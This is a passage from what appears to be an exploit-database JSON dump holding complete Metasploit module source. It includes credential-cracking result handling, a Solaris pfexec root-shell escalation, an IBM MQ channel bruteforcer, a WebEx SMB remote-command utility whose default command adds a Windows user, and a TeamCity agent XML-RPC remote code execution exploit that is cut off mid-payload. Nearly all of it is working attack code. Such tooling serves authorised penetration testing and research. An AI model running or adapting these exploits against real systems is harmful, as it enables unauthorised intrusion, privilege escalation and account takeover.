'mysql-sha1',\n 'oracle', 'dynamic_1506', 'oracle11', 'oracle12c'\n next unless fields.count >=3\n username = fields.shift\n core_id = fields.pop\n when 'dynamic_1506' #oracle H code\n next unless fields.count >=3\n username = fields.shift\n core_id = fields.pop\n when 'dynamic_1034' #postgres\n next unless fields.count >=2\n username = fields.shift\n password = fields.join(':')\n # unfortunately to match up all the fields we need to pull the hash\n # field as well, and it is only available in the pot file.\n pot = cracker.pot || cracker.john_pot_file\n\n File.open(pot, 'rb').each do |line|\n if line.start_with?('$dynamic_1034$') #postgres format\n lookups.each do |l|\n pot_hash = line.split(\":\")[0]\n raw_pot_hash = pot_hash.split('$')[2]\n if l.username.to_s == username &&\n l.jtr_hash == \"#{username}:$dynamic_1034$#{raw_pot_hash}\" &&\n l.db_hash == raw_pot_hash\n core_id = l.id\n break\n end\n end\n end\n end\n when 'lm', 'nt'\n next unless fields.count >=7\n username = fields.shift\n core_id = fields.pop\n 2.times{ fields.pop }\n # get the NT and LM hashes\n nt_hash = fields.pop\n lm_hash = fields.pop\n core_id = fields.pop\n password = fields.join(':')\n if format == 'lm'\n if password.blank?\n if nt_hash == Metasploit::Credential::NTLMHash::BLANK_NT_HASH\n password = ''\n else\n next\n end\n end\n password = john_lm_upper_to_ntlm(password, nt_hash)\n next if password.nil?\n end\n fields = password.split(':') #for consistency on the following join out of the case\n end\n unless core_id.nil?\n password = fields.join(':')\n print_good \"#{username}:#{password}\"\n create_cracked_credential( username: username, password: password, core_id: core_id)\n end\n end\n end\n if datastore['DeleteTempFiles']\n cleanup_files.each do |f|\n File.delete(f)\n end\n end\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/analyze/apply_pot.rb"}, {"lastseen": "2019-10-23T20:30:15", "bulletinFamily": "exploit", "description": "This module attempts to upgrade a shell session to UID 0 using pfexec.\n", "modified": "2019-02-01T22:58:21", "published": "2019-02-01T22:58:21", "id": "MSF:POST/SOLARIS/ESCALATE/PFEXEC", "href": "", "type": "metasploit", "title": "Solaris pfexec Upgrade Shell", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Post\n include Msf::Post::File\n include Msf::Post::Solaris::System\n include Msf::Post::Solaris::Priv\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Solaris pfexec Upgrade Shell',\n 'Description' => %q{\n This module attempts to upgrade a shell session to UID 0 using pfexec.\n },\n 'License' => MSF_LICENSE,\n 'Author' => ['bcoles'],\n 'Platform' => 'solaris',\n 'References' =>\n [\n ['URL', 'https://docs.oracle.com/cd/E19253-01/816-4557/prbactm-1/index.html'],\n ['URL', 'http://www.c0t0d0s0.org/archives/4844-Less-known-Solaris-features-pfexec.html'],\n ['URL', 'http://solaris.wikia.com/wiki/Providing_root_privileges_with_pfexec']\n ],\n 'SessionTypes' => ['shell']\n ))\n register_options [\n OptString.new('PFEXEC_PATH', [true, 'Path to pfexec', '/usr/bin/pfexec']),\n OptString.new('SHELL_PATH', [true, 'Path to shell', '/bin/sh'])\n ]\n end\n\n def shell_path\n datastore['SHELL_PATH'].to_s\n end\n\n def pfexec_path\n datastore['PFEXEC_PATH'].to_s\n end\n\n def run\n unless session.type == 'shell'\n fail_with Failure::BadConfig, \"This module is not compatible with #{session.type} sessions\"\n end\n\n if is_root?\n fail_with Failure::BadConfig, 'Session already has root privileges'\n end\n\n unless command_exists? pfexec_path\n fail_with Failure::NotVulnerable, \"#{pfexec_path} does not exist\"\n end\n\n user = cmd_exec('id -un').to_s\n\n print_status \"Trying pfexec as `#{user}' ...\"\n\n res = cmd_exec \"#{pfexec_path} #{shell_path} -c id\"\n vprint_status res\n\n unless res.include? 'uid=0'\n fail_with Failure::NotVulnerable, \"User `#{user}' does not have permission to escalate with pfexec\"\n end\n\n print_good 'Success! Upgrading session ...'\n\n cmd_exec \"#{pfexec_path} #{shell_path}\"\n\n unless is_root?\n fail_with Failure::NotVulnerable, 'Failed to escalate'\n end\n\n print_good 'Success! root shell secured'\n report_note(\n :host => session,\n :type => 'host.escalation',\n :data => \"User `#{user}' pfexec'ed to a root shell\"\n )\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/post/solaris/escalate/pfexec.rb"}, {"lastseen": "2019-11-29T22:02:43", "bulletinFamily": "exploit", "description": "This module uses a dictionary to bruteforce MQ channel names. For all identified channels it also returns if SSL is used and whether it is a server-connection channel.\n", "modified": "2018-11-20T22:24:17", "published": "2018-10-28T15:22:27", "id": "MSF:AUXILIARY/SCANNER/MISC/IBM_MQ_CHANNEL_BRUTE", "href": "", "type": "metasploit", "title": "IBM WebSphere MQ Channel Name Bruteforce", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n\n include Msf::Exploit::Remote::Tcp\n include Msf::Auxiliary::Scanner\n include Msf::Auxiliary::Report\n\n def initialize\n super(\n 'Name' => 'IBM WebSphere MQ Channel Name Bruteforce',\n 'Description' => 'This module uses a dictionary to bruteforce MQ channel names. For all identified channels it also returns if SSL is used and whether it is a server-connection channel.',\n 'Author' => 'Petros Koutroumpis',\n 'License' => MSF_LICENSE\n )\n register_options([\n Opt::RPORT(1414),\n OptInt.new('TIMEOUT', [true, \"The socket connect timeout in seconds\", 10]),\n OptInt.new('CONCURRENCY', [true, \"The number of concurrent channel names to check\", 10]),\n OptPath.new('CHANNELS_FILE',\n [ true, \"The file that contains a list of channel names\"]\n )])\n end\n\n def create_packet(chan)\n packet = \"\\x54\\x53\\x48\\x20\"+ \t# StructID\n \"\\x00\\x00\\x01\\x0c\"+ \t\t# MQSegmLen\n \"\\x02\" +\t\t\t \t# Byte Order\n \"\\x01\" +\t\t\t \t# SegmType\n \"\\x01\" +\t\t\t\t# CtlFlag1\n \"\\x00\" +\t\t\t\t# CtlFlag2\n \"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"+\t# LUWIdent\n \"\\x22\\x02\\x00\\x00\"+\t\t\t# Encoding\n \"\\xb5\\x01\" +\t\t\t# CCSID\n \"\\x00\\x00\" +\t\t\t# Reserved\n \"\\x49\\x44\\x20\\x20\" +\t\t# StructID\n \"\\x0d\" +\t\t\t\t# FAP Level\n \"\\x26\" +\t\t\t\t# CapFlag1 - Channel Type\n \"\\x00\" +\t\t\t\t# ECapFlag1\n \"\\x00\" +\t\t\t\t# IniErrFlg1\n \"\\x00\\x00\" +\t\t\t# Reserved\n \"\\x32\\x00\" +\t\t\t# MaxMsgBtch\n \"\\xec\\x7f\\x00\\x00\" +\t\t# MaxTrSize\n \"\\x00\\x00\\x40\\x00\" +\t\t# MaxMsgSize\n \"\\xff\\xc9\\x9a\\x3b\" +\t\t# SegWrapVal\n + chan + \t\t\t\t# Channel name\n \"\\x20\" +\t\t\t\t# CapFlag2\n \"\\x20\" +\t\t\t\t# ECapFlag2\n \"\\x20\\x20\" +\t\t\t# ccsid\n \"QM1\" + \"\\x20\"*45 +\t\t\t# Queue Manager Name\n \"\\x20\\x20\\x20\\x20\" +\t\t# HBInterval\n \"\\x20\\x20\" +\t\t\t# EFLLength\n \"\\x20\" +\t\t\t\t# IniErrFlg2\n \"\\x20\" +\t\t\t\t# Reserved1\n \"\\x20\\x20\" +\t\t\t# HdrCprLst\n \"\\x20\\x20\\x20\\x20\\x2c\\x01\\x00\\x00\"+ # MSGCprLst1\n \"\\x8a\\x00\\x00\\x55\\x00\\xff\\x00\\xff\"+ # MsgCprLst2\n \"\\xff\\xff\" +\t\t\t# Reserved2\n \"\\xff\\xff\\xff\\xff\" +\t\t# SSLKeyRst\n \"\\xff\\xff\\xff\\xff\" +\t\t# ConvBySKt\n \"\\xff\" +\t\t\t\t# CapFlag3\n \"\\xff\" +\t\t\t\t# ECapFlag3\n \"\\xff\\xff\" +\t\t\t# Reserved3\n \"\\x00\\x00\\x00\\x00\" +\t\t# ProcessId\n \"\\x00\\x00\\x00\\x00\" +\t\t# ThreadId\n \"\\x00\\x00\\x05\\x00\" +\t\t# TraceId\n \"\\x00\\x00\\x10\\x13\\x00\\x00\" + \t# ProdId\n \"\\x01\\x00\\x00\\x00\\x01\\x00\" + \t# ProdId\n \"MQMID\" + \"\\x20\"*43 +\t\t# MQM Id\n \"\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\"+ # Unknown\n \"\\x20\\x20\\x20\\x20\\x20\\x20\\x00\\x00\"+ # Unknown\n \"\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\"+ # Unknown\n \"\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\"+ # Unknown\n \"\\xff\\xff\\x00\\x00\\x00\\x00\\x00\\x00\"+ # Unknown\n \"\\x00\\x00\\x00\\x00\\x00\\x00\"\t\t# Unknown\n end\n\n\n def run_host(ip)\n @channels = []\n @unencrypted_mqi_channels = []\n begin\n channel_list\n rescue ::Rex::ConnectionRefused\n fail_with(Failure::Unreachable, \"TCP Port closed.\")\n rescue ::Rex::ConnectionError, ::IOError, ::Timeout::Error, Errno::ECONNRESET\n fail_with(Failure::Unreachable, \"Connection Failed.\")\n rescue ::Exception => e\n fail_with(Failure::Unknown, e)\n end\n if(@channels.empty?)\n print_status(\"#{ip}:#{rport} No channels found.\")\n else\n print_good(\"Channels found: #{@channels}\")\n print_good(\"Unencrypted MQI Channels found: #{@unencrypted_mqi_channels}\")\n report_note(\n :host => rhost,\n :port => rport,\n :type => 'mq.channels'\n )\n print_line\n end\n end\n\n def channel_list\n channel_data = get_channel_names\n while (channel_data.length > 0)\n t = []\n r = []\n begin\n 1.upto(datastore['CONCURRENCY']) do\n this_channel = channel_data.shift\n if this_channel.nil?\n next\n end\n t << framework.threads.spawn(\"Module(#{self.refname})-#{rhost}:#{rport}\", false, this_channel) do |channel|\n connect\n vprint_status \"#{rhost}:#{rport} - Sending request for #{channel}...\"\n if channel.length.to_i > 20\n print_error(\"Channel names cannot exceed 20 characters. Skipping.\")\n next\n end\n chan = channel + \"\\x20\"*(20-channel.length.to_i)\n timeout = datastore['TIMEOUT'].to_i\n s = connect(false,\n {\n 'RPORT' => rport,\n 'RHOST' => rhost,\n }\n )\n s.put(create_packet(chan))\n data = s.get_once(-1,timeout)\n if data.nil?\n print_status(\"No response received. Try increasing timeout.\")\n next\n end\n if not data[0...3].include? 'TSH'\n next\n end\n if data[-4..-1] == \"\\x01\\x00\\x00\\x00\" # NO_CHANNEL code\n next\n end\n if data[-4..-1] == \"\\x18\\x00\\x00\\x00\" # CIPHER_SPEC code\n print_status(\"Found channel: #{channel}, IsEncrypted: True, IsMQI: N/A\")\n elsif data[-4..-1] == \"\\x02\\x00\\x00\\x00\" # CHANNEL_WRONG_TYPE code\n print_status(\"Found channel: #{channel}, IsEncrypted: False, IsMQI: False\")\n else\n print_status(\"Found channel: #{channel}, IsEncrypted: False, IsMQI: True\")\n @unencrypted_mqi_channels << channel\n end\n @channels << channel\n disconnect\n end\n end\n t.each {|x| x.join }\n end\n end\n end\n\n def get_channel_names\n if(! @common)\n File.open(datastore['CHANNELS_FILE'], \"rb\") do |fd|\n data = fd.read(fd.stat.size)\n @common = data.split(/\\n/).compact.uniq\n end\n end\n @common\n end\n\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/misc/ibm_mq_channel_brute.rb"}, {"lastseen": "2019-12-02T17:24:22", "bulletinFamily": "exploit", "description": "This module enables the execution of a single command as System by exploiting a remote code execution vulnerability in Cisco's WebEx client software.\n", "modified": "2018-10-24T21:18:17", "published": "2018-10-23T20:51:23", "id": "MSF:AUXILIARY/ADMIN/SMB/WEBEXEC_COMMAND", "href": "", "type": "metasploit", "title": "WebEx Remote Command Execution Utility", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::SMB::Client::WebExec\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n\n # Aliases for common classes\n SIMPLE = Rex::Proto::SMB::SimpleClient\n XCEPT = Rex::Proto::SMB::Exceptions\n CONST = Rex::Proto::SMB::Constants\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'WebEx Remote Command Execution Utility',\n 'Description' => %q{\n This module enables the execution of a single command as System by exploiting a remote\n code execution vulnerability in Cisco's WebEx client software.\n },\n\n 'Author' => [\n 'Ron Bowes <ron@skullsecurity.net>',\n ],\n\n 'License' => MSF_LICENSE,\n 'References' => [\n ['URL', 'https://webexec.org'],\n ['CVE', '2018-15442']\n ]\n ))\n\n register_options([\n OptString.new('COMMAND', [true, 'The command you want to execute on the remote host', 'net user testuser testpass /add']),\n OptPort.new('RPORT', [true, 'The Target port', 445]),\n OptBool.new('FORCE_GUI', [true, 'Ensure a GUI is created via wmic', false]),\n ])\n end\n\n # This is the main control method\n def run_host(ip)\n @smbshare = datastore['SMBSHARE']\n @ip = ip\n\n # Try and authenticate with given credentials\n if connect\n begin\n smb_login\n rescue Rex::Proto::SMB::Exceptions::Error => autherror\n print_error(\"Unable to authenticate with given credentials: #{autherror}\")\n return\n end\n\n command = datastore['COMMAND']\n if datastore['FORCE_GUI']\n command = \"WMIC PROCESS CALL Create \\\"#{command}\\\"\"\n end\n\n wexec(true) do |opts|\n execute_single_command(command, opts)\n end\n\n print_good(\"Command completed!\")\n disconnect\n end\n end\nend\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/admin/smb/webexec_command.rb"}, {"lastseen": "2019-11-22T08:34:41", "bulletinFamily": "exploit", "description": "This module allows remote code execution on TeamCity Agents configured to use bidirectional communication via xml-rpc. In bidirectional mode the TeamCity server pushes build commands to the Build Agents over port TCP/9090 without requiring authentication. Up until version 10 this was the default configuration. This module supports TeamCity agents from version 6.0 onwards.\n", "modified": "2018-11-27T20:23:56", "published": "2018-08-28T08:35:17", "id": "MSF:EXPLOIT/MULTI/MISC/TEAMCITY_AGENT_XMLRPC_EXEC", "href": "", "type": "metasploit", "title": "TeamCity Agent XML-RPC Command Execution", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::CmdStager\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'TeamCity Agent XML-RPC Command Execution',\n 'Description' => %q(\n This module allows remote code execution on TeamCity Agents configured\n to use bidirectional communication via xml-rpc. In bidirectional mode\n the TeamCity server pushes build commands to the Build Agents over port\n TCP/9090 without requiring authentication. Up until version 10 this was\n the default configuration. This module supports TeamCity agents from\n version 6.0 onwards.\n ),\n 'Author' => ['Dylan Pindur <dylanpindur@gmail.com>'],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n ['URL', 'https://www.tenable.com/plugins/nessus/94675']\n ],\n 'Platform' => %w[linux win],\n 'Targets' =>\n [\n ['Windows', { 'Platform' => 'win' }],\n ['Linux', { 'Platform' => 'linux' }]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Apr 14 2015'))\n\n deregister_options('SRVHOST', 'SRVPORT', 'URIPATH', 'VHOST')\n register_options(\n [\n Opt::RPORT(9090),\n OptString.new(\n 'CMD',\n [false, 'Execute this command instead of using command stager', '']\n )\n ]\n )\n end\n\n def check\n version = determine_version\n if !version.nil? && version >= 15772\n Exploit::CheckCode::Appears\n else\n Exploit::CheckCode::Safe\n end\n end\n\n def exploit\n version = determine_version\n if version.nil?\n fail_with(Failure::NoTarget, 'Could not determine TeamCity Agent version')\n else\n print_status(\"Found TeamCity Agent running build version #{version}\")\n end\n\n unless datastore['CMD'].blank?\n print_status('Executing user supplied command')\n execute_command(datastore['CMD'], version)\n return\n end\n\n case target['Platform']\n when 'linux'\n linux_stager(version)\n when 'win'\n windows_stager(version)\n else\n fail_with(Failure::NoTarget, 'Unsupported target platform!')\n end\n end\n\n def windows_stager(version)\n print_status('Constructing Windows payload')\n\n stager = generate_cmdstager(\n flavor: :certutil,\n temp: '.',\n concat_operator: \"\\n\",\n nodelete: true\n ).join(\"\\n\")\n stager = stager.gsub(/^(?<exe>.{5}\\.exe)/, 'start \"\" \\k<exe>')\n\n xml_payload = build_request(stager, version)\n if xml_payload.nil?\n fail_with(Failure::NoTarget, \"No compatible build config for TeamCity build #{version}\")\n end\n\n print_status(\"Found compatible build config for TeamCity build #{version}\")\n send_request(xml_payload)\n end\n\n def linux_stager(version)\n print_status('Constructing Linux payload')\n\n stager = generate_cmdstager(\n flavor: :printf,\n temp: '.',\n concat_operator: \"\\n\",\n nodelete: true\n ).join(\"\\n\")\n stager << ' &'\n\n xml_payload = build_request(stager, version)\n if xml_payload.nil?\n fail_with(Failure::NoTarget, \"No compatible build config for TeamCity build #{version}\")\n end\n\n print_status(\"Found compatible build config for TeamCity build #{version}\")\n send_request(xml_payload)\n end\n\n def execute_command(cmd, version)\n xml_payload = build_request(cmd, version)\n\n if xml_payload.nil?\n fail_with(Failure::NoTarget, \"No compatible build config for TeamCity build #{version}\")\n end\n\n print_status(\"Found compatible build config for TeamCity build #{version}\")\n send_request(xml_payload)\n end\n\n def determine_version\n xml_payload = %(\n<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<methodCall>\n <methodName>buildAgent.getVersion</methodName>\n <params></params>\n</methodCall>\n )\n res = send_request_cgi(\n {\n 'uri' => '/',\n 'method' => 'POST',\n 'ctype' => 'text/xml',\n 'data' => xml_payload.strip!\n },\n 10\n )\n\n if !res.nil? && res.code == 200\n xml_doc = res.get_xml_document\n if xml_doc.errors.empty?\n val = xml_doc.xpath('/methodResponse/params/param/value')\n if val.length == 1\n return val.text.to_i\n end\n end\n end\n return nil\n end\n\n def send_request(xml_payload)\n res = send_request_cgi(\n {\n 'uri' => '/',\n 'method' => 'POST',\n 'ctype' => 'text/xml',\n 'data' => xml_payload\n },\n 10\n )\n\n if !res.nil? && res.code == 200\n print_status(\"Successfully sent build configuration\")\n else\n print_status(\"Failed to send build configuration\")\n end\n end\n\n def build_request(script_content, version)\n case version\n when 0..15771\n return nil\n when 15772..17794\n return req_teamcity_6(script_content)\n when 17795..21240\n return req_teamcity_6_5(script_content)\n when 21241..27401\n return req_teamcity_7(script_content)\n when 27402..32059\n return req_teamcity_8(script_content)\n when 32060..42001\n return req_teamcity_9(script_content)\n when 42002..46532\n return req_teamcity_10(script_content)\n else\n return req_teamcity_2017(script_content)\n end\n end\n\n def req_teamcity_2017(script_content)\n build_code = Rex::Text.rand_text_alpha(8)\n build_id = Rex::Text.rand_text_numeric(8)\n xml_payload = %(\n<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<methodCall>\n <methodName>buildAgent.runBuild</methodName>\n <params>\n <param>\n <value>\n <![CDATA[\n <AgentBuild>\n <myBuildId>#{build_id}</myBuildId>\n <myBuildTypeId>x</myBuildTypeId>\n <myBuildTypeExternalId>x</myBuildTypeExternalId>\n <myCheckoutType>ON_AGENT</myCheckoutType>\n <myVcsSettingsHashForServerCheckout>x</myVcsSettingsHashForServerCheckout>\n <myVcsSettingsHashForAgentCheckout>#{build_code}</myVcsSettingsHashForAgentCheckout>\n <myVcsSettingsHashForManualCheckout>x</myVcsSettingsHashForManualCheckout>\n <myDefaultExecutionTimeout>3</myDefaultExecutionTimeout>\n <myServerParameters class=\"StringTreeMap\">\n <k>system.build.number</k>\n <v>0</v>\n </myServerParameters>\n <myAccessCode/>\n <myArtifactDependencies/>\n <myArtifactPaths/>\n <myArtifactStorageSettings/>\n <myBuildFeatures/>\n <myBuildTypeOptions/>\n <myFullCheckoutReasons/>\n <myParametersSpecs class=\"StringTreeMap\"/>\n <myPersonalVcsChanges/>\n <myUserBuildParameters/>\n <myVcsChanges/>\n <myVcsRootCurrentRevisions class=\"tree-map\"/>\n <myVcsRootEntries/>\n <myVcsRootOldRevisions class=\"tree-map\"/>\n <myBuildRunners>\n <jetbrains.buildServer.agentServer.BuildRunnerData>\n <myId>x</myId>\n <myIsDisabled>false</myIsDisabled>\n <myRunType>simpleRunner</myRunType>\n <myRunnerName>x</myRunnerName>\n <myChildren class=\"list\"/>\n <myServerParameters class=\"tree-map\">\n <entry>\n <string>teamcity.build.step.name</string>\n <string>x</string>\n </entry>\n </myServerParameters>\n <myRunnerParameters class=\"tree-map\">\n <entry>\n <string>script.content</string>\n <string>#{script_content}</string>\n </entry>\n <entry>\n <string>teamcity.step.mode</string>\n <string>default</string>\n </entry>\n <entry>\n <string>use.custom.script</string>\n <string>true</string>\n </entry>\n </myRunnerParameters>\n </jetbrains.buildServer.agentServer.BuildRunnerData>\n </myBuildRunners>\n </AgentBuild>\n ]]>\n </value>\n </param>\n </params>\n</methodCall>\n )\n return xml_payload.strip!\n end\n\n def req_teamcity_10(script_content)\n build_code = Rex::Text.rand_text_alpha(8)\n build_id = Rex::Text.rand_text_numeric(8)\n xml_payload = %(\n<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<methodCall>\n <methodName>buildAgent.runBuild</methodName>\n <params>\n <param>\n <value>\n <![CDATA[\n <AgentBuild>\n <myBuildId>#{build_id}</myBuildId>\n <myBuildTypeId>x</myBuildTypeId>\n <myBuildTypeExternalId>x</myBuildTypeExternalId>\n <myCheckoutType>ON_AGENT</myCheckoutType>\n <myVcsSettingsHashForServerCheckout>x</myVcsSettingsHashForServerCheckout>\n <myVcsSettingsHashForAgentCheckout>#{build_code}</myVcsSettingsHashForAgentCheckout>\n <myVcsSettingsHashForManualCheckout>x</myVcsSettingsHashForManualCheckout>\n <myDefaultExecutionTimeout>3</myDefaultExecutionTimeout>\n <myServerParameters class=\"StringTreeMap\">\n <k>system.build.number</k>\n <v>0</v>\n </myServerParameters>\n <myAccessCode/>\n <myArtifactDependencies/>\n <myArtifactPaths/>\n <myBuildFeatures/>\n <myBuildTypeOptions/>\n <myFullCheckoutReasons/>\n <myParametersSpecs class=\"StringTreeMap\"/>\n <myPersonalVcsChanges/>\n <myUserBuildParameters/>\n <myVcsChanges/>\n <myVcsRootCurrentRevisions class=\"tree-map\"/>\n <myVcsRootEntries/>\n <myVcsRootOldRevisions class=\"tree-map\"/>\n <myBuildRunners>\n <jetbrains.buildServer.agentServer.BuildRunnerData>\n <myId>x</myId>\n <myIsDisabled>false</myIsDisabled>\n <myRunType>simpleRunner</myRunType>\n <myRunnerName>x</myRunnerName>\n <myChildren class=\"list\"/>\n <myServerParameters class=\"tree-map\">\n <entry>\n <string>teamcity.build.step.name</string>\n <string>x</string>\n </entry>\n </myServerParameters>\n <myRunnerParameters class=\"tree-map\">\n <entry>\n <string>script.content</string>\n <string>#{script_content}</string>\n </entry>\n <entry>\n <string>teamcity.step.mode</string>\n <string>default</string>\n </entry>\n <entry>\n <string>use.custom.script</string>\n <string>true</string>\n </entry>\n </myRunnerParameters>\n </jetbrains.buildServer.agentServer.BuildRunnerData>\n </myBuildRunners>\n </AgentBuild>\n ]]>\n </value>\n </param>\n </params>\n</methodCall>\n )\n return xml_payload.strip!\n end\n\n def req_teamcity_9(script_content)\n build_id = Rex::Text.rand_text_numeric(8)\n xml_payload = %(\n<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<methodCall>\n <methodName>buildAgent.runBuild</methodName>\n <params>\n <param>\n <value>\n <![CDATA[\n <AgentBuild>\n <myBuildId>#{build_id}</myBuildId>\n <myBuildTypeId>x</myBuildTypeId>\n <myBuildTypeExternalId>x</myBuildTypeExternalId>\n <myCheckoutType>ON_AGENT</myCheckoutType>\n <myDefaultCheckoutDirectory>x</myDefaultCheckoutDirectory>\n <myDefaultExecutionTimeout>3</myDefaultExecutionTimeout>\n <myServerParameters class=\"StringTreeMap\">\n <k>system.build.number</k>\n <v>0</v>\n </myServerParameters>\n <myAccessCode/>\n <myArtifactDependencies/>\n <myArtifactPaths/>\n <myBuildFeatures/>\n <myBuildTypeOptions/>\n <myFullCheckoutReasons/>\n <myPersonalVcsChanges/>\n <myUserBuildParameters/>\n <myVcsChanges/>\n <myVcsRootCurrentRevisions class=\"tree-map\"/>\n <myVcsRootEntries/>\n <myVcsRootOldRevisions class=\"tree-map\"/>\n <myBuildRunners>\n <jetbrains.buildServer.agentServer.BuildRunnerData>\n <myId>x</myId>\n <myIsDisabled>false</myIsDisabled>\n <myRunType>simpleRunner</myRunType>\n <myRunnerName>x</myRunnerName>\n <myChildren class=\"list\"/>\n <myServerParameters class=\"tree-map\">\n <entry>\n <string>teamcity.build.step.name</string>\n <string>x</string>\n </entry>\n </myServerParameters>\n <myRunnerParameters class=\"tree-map\">\n <entry>\n <string>script.content</string>\n <string>#{script_content}</string>\n </entry>\n <entry>\n <string>teamcity.step.mode</string>\n <string>default</string>\n </entry>\n <entry>\n <string>use.custom.script</string>\n <string>true</string>\n </entry>\n </myRunnerParameters>\n </jetbrains.buildServer.agentServer.BuildRunnerData>\n </myBuildRunners>\n </AgentBuild>\n ]]>\n </value>\n </param>\n </params>\n</methodCall>\n )\n return xml_payload.strip!\n end\n\n def req_teamcity_8(script_content)\n build_id = Rex::Text.rand_text_numeric(8)\n xml_payload = %(\n<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<methodCall>\n <methodName>buildAgent.runBuild</methodName>\n <params>\n <param>\n <value>\n <![CDATA[\n <AgentBuild>\n <myBuildId>#{build_id}</myBuildId>\n <myBuildTypeId>x</myBuildTypeId>\n <myCheckoutType>ON_AGENT</myCheckoutType>\n <myDefaultCheckoutDirectory>x</myDefaultCheckoutDirectory>\n <myServerParameters class=\"tree-map\">\n <entry>\n <string>system.build.number</string>\n <string>0</string>\n </entry>\n </myServerParameters>\n <myAccessCode/>\n <myArtifactDependencies/>\n <myArtifactPaths/>\n <myBuildTypeOptions/>\n <myFullCheckoutReasons/>\n <myPersonalVcsChanges/>\n <myUserBuildParameters/>\n <myVcsChanges/>\n <myVcsRootCurrentRevisions class=\"tree-map\"/>\n <myVcsRootEntries/>\n <myVcsRootOldRevisions class=\"tree-map\"/>\n <myBuildRunners>\n <jetbrains.buildServer.agentServer.BuildRunnerData>\n <myId>x</myId>\n <myIsDisabled>false</myIsDisabled>\n <myRunType>simpleRunner</myRunType>\n <myRunnerName>x</myRunnerName>\n <myChildren class=\"list\"/>\n <myServerParameters class=\"tree-map\">\n <entry>\n <string>teamcity.build.step.name</string>\n <string>x</string>\n </entry>\n </myServerParameters>\n <myRunnerParameters class=\"tree-map\">\n <entry>\n <string>script.content</string>\n <string>#{script_content}</string>\n </entry>\n <entry>\n <string>teamcity.step.mode</string>\n <string>default</string>\n </entry>\n <entry>\n <string>use.custom.script</string>\n <string>true</string>\n </entry>\n </myRunnerParameters>\n </jetbrains.buildServer.agentServer.BuildRunnerData>\n </myBuildRunners>\n <myDefaultExecutionTimeout>3</myDefaultExecutionTimeout>\n <myBuildFeatures/>\n </AgentBuild>\n ]]>\n </value>\n </param>\n </params>\n</methodCall>\n )\n return xml_payload.strip!\n end\n\n def req_teamcity_7(script_content)\n build_id = Rex::Text.rand_text_numeric(8)\n xml_payload = %(\n<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<methodCall>\n <methodName>buildAgent.runBuild</methodName>\n <params>\n <param>\n <value>\n <![CDATA[\n <AgentBuild>\n <myBuildId>#{build_id}</myBuildId>\n <myBuildTypeId>x</myBuildTypeId>\n <myCheckoutType>ON_AGENT</myCheckoutType>\n <myDefaultCheckoutDirectory>x</myDefaultCheckoutDirectory>\n <myServerParameters class=\"tree-map\">\n <no-comparator/>\n <entry>\n <string>system.build.number</string>\n <string>0</string>\n </entry>\n </myServerParameters>\n <myVcsRootOldRevisions class=\"tree-map\">\n <no-comparator/>\n </myVcsRootOldRevisions>\n <myVcsRootCurrentRevisions class=\"tree-map\">\n <no-comparator/>\n </myVcsRootCurrentRevisions>\n <myAccessCode/>\n <myArtifactDependencies/>\n <myArtifactPaths/>\n <myBuildTypeOptions/>\n <myFullCheckoutReasons/>\n <myPersonalVcsChanges/>\n <myUserBuildParameters/>\n <myVcsChanges/>\n <myVcsRootEntries/>\n <myBuildRunners>\n <jetbrains.buildServer.agentServer.BuildRunnerData>\n <myRunType>simpleRunner</myRunType>\n <myRunnerName>x</myRunnerName>\n <myRunnerParameters class=\"tree-map\">\n <no-comparator/>\n <entry>\n <string>script.content</string>\n <string>#{script_content}</string>\n </entry>\n <entry>\n <string>teamcity.step.mode</string>\n <string>default</string>\n </entry>\n <entry>\n <string>use.custom.script</string>\n <string>true</string>\n </entry>\n </myRunnerParameters>\n <myServerParameters class=\"tree-map\">\n <no-comparator/>\n <entry>\n <string>teamcity.build.step.name</string>\n <string>x</string>\n </entry>\n </myServerParameters>\n </jetbrains.buildServer.agentServer.BuildRunnerData>\n </myBuildRunners>\n <myDefaultExecutionTimeout>3</myDefaultExecutionTimeout>\n <myBuildFeatures/>\n </AgentBuild>\n ]]>\n </value>\n </param>\n </params>\n</methodCall>\n )\n return xml_payload.strip!\n end\n\n def req_teamcity_6_5(script_content)\n build_id = Rex::Text.rand_text_numeric(8)\n xml_payload = %(\n<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<methodCall>\n <methodName>buildAgent.run</methodName>\n <params>\n <param>\n <value>\n <![CDATA[\n <AgentBuild>\n 